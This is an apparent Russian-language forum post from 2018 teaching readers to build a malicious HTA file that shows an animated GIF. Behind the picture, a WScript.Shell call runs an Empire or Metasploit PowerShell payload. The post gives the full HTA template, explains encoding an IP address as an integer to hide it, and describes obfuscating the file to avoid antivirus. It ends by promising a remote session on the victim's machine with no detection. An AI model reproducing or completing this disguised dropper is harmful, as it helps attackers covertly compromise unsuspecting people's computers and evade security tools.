Заражение без подозрений

Поехали!)

Идем искать картинку (живую) то есть gif-ку .. была выбрана эта) далее нам по требуется код:

генерируем powershell в Empire или Metasploit я выбрал ..

>>>КОД СКРИПТА<<<

  1. <html>
  2. <head>
  3.    <title>NazvanieGif</title>
  4.    <hta:application id="NazvanieGif"
  5.            border="thin"
  6.            borderstyle="complex"
  7.            maximizeButton="no"
  8.            minimizeButton="no"
  9.    />
  10.  
  11. </head>
  12.  
  13. <script type="text/javascript">
  14.  
  15. var index = -1;
  16. var images = [
  17.   "data:image/gif;base64,"];
  18.  
  19.  
  20. function initGallery(){
  21.   window.resizeTo(300,300);
  22.   htaPayload();
  23.   nextPicture();
  24. }
  25.  
  26. function nextPicture(){
  27.   var img;
  28.   index = index + 1;
  29.   if (index > images.length -1 ){
  30.     index = 0;
  31.   }
  32.   img = document.getElementById("gallery");
  33.   img.src = images[index];
  34. }
  35.  
  36. function htaPayload(){
  37.   var payload="";
  38.   try{
  39.    if (navigator.userAgent.indexOf("Windows") !== -1){
  40.     new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
  41.    }
  42.   }
  43.   catch(e){
  44.   }
  45. }
  46.  
  47. </script>
  48.  
  49. <style>
  50.  
  51. #gallery, div {
  52.  width: 100%;
  53.  height: 100%;
  54. }
  55.  
  56. #outer {
  57.  text-align: center;
  58. }
  59.  
  60. #inner{
  61.  display: inline-block;
  62. }
  63.  
  64. body {
  65.  background-color: black;
  66. }
  67.  
  68. </style>
  69. <body onload="initGallery()">
  70.   <div id="outer">
  71.     <div id="inner">
  72.      <img id="gallery" onclick="nextPicture()">
  73.     </div>
  74.   </div>
  75. </body>
  76. </html>

и вставляем в 37 строчку, между)

далее переходим на очень полезный онлайн ресурс иногда кстати выручает для различного рода задач, например кодировке IP адреса в бинарник для последущего его скрытия, не множечко отступлю от темы покажу: например скрываем 127.0.0.1

127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433 

так вот переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в

как видите в 17 строку)

Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе

сохраняем полученный код в блокноте, под любым именем но в формате .hta < -- что это за формат, у нас написано здесь Пингвиныч, привет!)) "Решил я продолжит твою темку)"

Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котикам или c ..уем), а к Вам прилетит заветная сессия) при желании можно иконку навесить (не знаю как, если кто знает, подскажите) и ДЕТЕКТА НЕТ!! 

July 28, 2018
by @darken_post
0
18
Show more